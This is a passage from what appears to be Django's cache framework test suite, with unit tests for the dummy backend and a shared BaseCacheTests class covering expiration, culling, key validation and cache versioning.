"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_get_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.get_many(['key with spaces'])
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertIsNone(cache.get("key1"))
self.assertIs(cache.delete("key1"), False)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), False)
self.assertIs(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
cache.decr('does_not_exist', -1)
def test_touch(self):
"""Dummy cache can't do touch()."""
self.assertIs(cache.touch('whatever'), False)
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertIsNone(cache.get("expire2"))
self.assertIs(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
self.assertEqual(cache.set_many({'a': 1, 'b': 2}), [])
self.assertEqual(cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1'), [])
def test_set_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.set_many({'key with spaces': 'foo'})
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_delete_many_invalid_key(self):
msg = KEY_ERRORS_WITH_MEMCACHED_MSG % ':1:key with spaces'
with self.assertWarnsMessage(CacheKeyWarning, msg):
cache.delete_many(['key with spaces'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertIsNone(cache.get_or_set('mykey', None))
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
factory = RequestFactory()
# RemovedInDjango41Warning: python-memcached doesn't support .get() with
# default.
supports_get_with_default = True
# Some clients raise custom exceptions when .incr() or .decr() are called
# with a non-integer value.
incr_decr_type_error = TypeError
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_default_used_when_none_is_set(self):
"""If None is cached, get() returns it instead of the default."""
cache.set('key_default_none', None)
self.assertIsNone(cache.get('key_default_none', default='default'))
def test_add(self):
# A key can be added to a cache
self.assertIs(cache.add("addkey1", "value"), True)
self.assertIs(cache.add("addkey1", "newvalue"), False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertIs(caches['prefix'].has_key('somekey'), False)
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set_many({'a': 'a', 'b': 'b', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
self.assertEqual(cache.get_many(iter(['a', 'b', 'e'])), {'a': 'a', 'b': 'b'})
cache.set_many({'x': None, 'y': 1})
self.assertEqual(cache.get_many(['x', 'y']), {'x': None, 'y': 1})
def test_delete(self):
# Cache keys can be deleted
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(cache.get("key1"), "spam")
self.assertIs(cache.delete("key1"), True)
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_delete_nonexistent(self):
self.assertIs(cache.delete('nonexistent_key'), False)
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertIs(cache.has_key("hello1"), True)
self.assertIs(cache.has_key("goodbye1"), False)
cache.set("no_expiry", "here", None)
self.assertIs(cache.has_key("no_expiry"), True)
cache.set('null', None)
self.assertIs(
cache.has_key('null'),
True if self.supports_get_with_default else False,
)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
cache.set('null', None)
if self.supports_get_with_default:
self.assertIn('null', cache)
else:
self.assertNotIn('null', cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.incr('null')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
with self.assertRaises(ValueError):
cache.incr('does_not_exist', -1)
cache.set('null', None)
with self.assertRaises(self.incr_decr_type_error):
cache.decr('null')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
self.assertIs(cache.add("expire2", "newvalue"), True)
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertIs(cache.has_key("expire3"), False)
def test_touch(self):
# cache.touch() updates the timeout.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1', timeout=4), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
time.sleep(3)
self.assertIs(cache.has_key('expire1'), False)
# cache.touch() works without the timeout argument.
cache.set('expire1', 'very quickly', timeout=1)
self.assertIs(cache.touch('expire1'), True)
time.sleep(2)
self.assertIs(cache.has_key('expire1'), True)
self.assertIs(cache.touch('nonexistent'), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertIs(cache.delete(key), True)
self.assertIs(cache.add(key, value), True)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
self.assertIs(cache.delete(key), True)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
self.assertIs(cache.add('binary1-add', compressed_value), True)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set_many({'key1': 'spam', 'key2': 'eggs', 'key3': 'ham'})
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set_many({'key1': 'spam', 'key2': 'eggs'})
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Follow memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1), True)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
self.assertIs(cache.add('key2', 'ham', None), True)
self.assertEqual(cache.get('key2'), 'ham')
self.assertIs(cache.add('key1', 'new eggs', None), False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
cache.set('key5', 'belgian fries', timeout=1)
self.assertIs(cache.touch('key5', timeout=None), True)
time.sleep(2)
self.assertEqual(cache.get('key5'), 'belgian fries')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
self.assertIs(cache.add('key2', 'ham', 0), True)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
cache.set('key5', 'belgian fries', timeout=5)
self.assertIs(cache.touch('key5', timeout=0), True)
self.assertIsNone(cache.get('key5'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache_name, initial_count, final_count):
try:
cull_cache = caches[cull_cache_name]
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test('cull', 50, 29)
def test_zero_cull(self):
self._perform_cull_test('zero_cull', 50, 19)
def test_cull_delete_when_store_empty(self):
try:
cull_cache = caches['cull']
except InvalidCacheBackendError:
self.skipTest("Culling isn't implemented.")
old_max_entries = cull_cache._max_entries
# Force _cull to delete on first cached record.
cull_cache._max_entries = -1
try:
cull_cache.set('force_cull_delete', 'value', 1000)
self.assertIs(cull_cache.has_key('force_cull_delete'), True)
finally:
cull_cache._max_entries = old_max_entries
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends should warn (except memcached that should
error) on keys that would be refused by memcached. This encourages
portable caching code without making it too difficult to use production
backends with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
tests = [
('add', [key, 1]),
('get', [key]),
('set', [key, 1]),
('incr', [key]),
('decr', [key]),
('touch', [key]),
('delete', [key]),
('get_many', [[key, 'b']]),
('set_many', [{key: 1, 'b': 2}]),
('delete_many', [[key, 'b']]),
]
try:
for operation, args in tests:
with self.subTest(operation=operation):
with self.assertWarns(CacheKeyWarning) as cm:
getattr(cache, operation)(*args)
self.assertEqual(str(cm.warning), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
self._perform_invalid_key_test(key, KEY_ERRORS_WITH_MEMCACHED_MSG % key)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
self.assertIs(cache.add('answer1', 42, version=2), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=2), False)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertIs(cache.add('answer1', 37, version=1), True)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
self.assertIs(caches['v2'].add('answer2', 42), True)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37), False)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertIs(caches['v2'].add('answer2', 37, version=1), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
self.assertIs(caches['v2'].add('answer3', 42, version=1), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37, version=1), False)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
self.assertIs(caches['v2'].add('answer3', 37), True)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertIs(cache.has_key('answer1'), True)
self.assertIs(cache.has_key('answer1', version=1), True)
self.assertIs(cache.has_key('answer1', version=2), False)
self.assertIs(caches['v2'].has_key('answer1'), False)
self.assertIs(caches['v2'].has_key('answer1', version=1), True)
self.assertIs(caches['v2'].has_key('answer1', version=2), False)
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertIs(cache.delete('answer1'), True)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertIs(cache.delete('answer2', version=2), True)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertIs(caches['v2'].delete('answer3'), True)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertIs(caches['v2'].delete('answer4', version=1), True)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
self.assertEqual(cache.incr('answer1'), 38)
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
self.assertEqual(cache.decr('answer1'), 37)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
self.assertEqual(cache.incr('answer2', version=2), 43)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
self.assertEqual(cache.decr('answer2', version=2), 42)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
self.assertEqual(caches['v2'].incr('answer3'), 43)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
self.assertEqual(caches['v2'].decr('answer3'), 42)
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
self.assertEqual(caches['v2'].incr('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
self.assertEqual(caches['v2'].decr('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
cache.set('null', None)
if self.supports_get_with_default:
self.assertEqual(cache.incr_version('null'), 2)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.incr_version('null')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
cache.set('null', None, version=2)
if self.supports_get_with_default:
self.assertEqual(cache.decr_version('null', version=2), 1)
else:
with self.assertRaises(self.incr_decr_type_error):
cache.decr_version('null', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
fetch_middleware = FetchFromCacheMiddleware(empty_response)
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
content = 'Testing cookie serialization.'
def get_response(req):
response = HttpResponse(content)
response.set_cookie('foo', 'bar')
return response
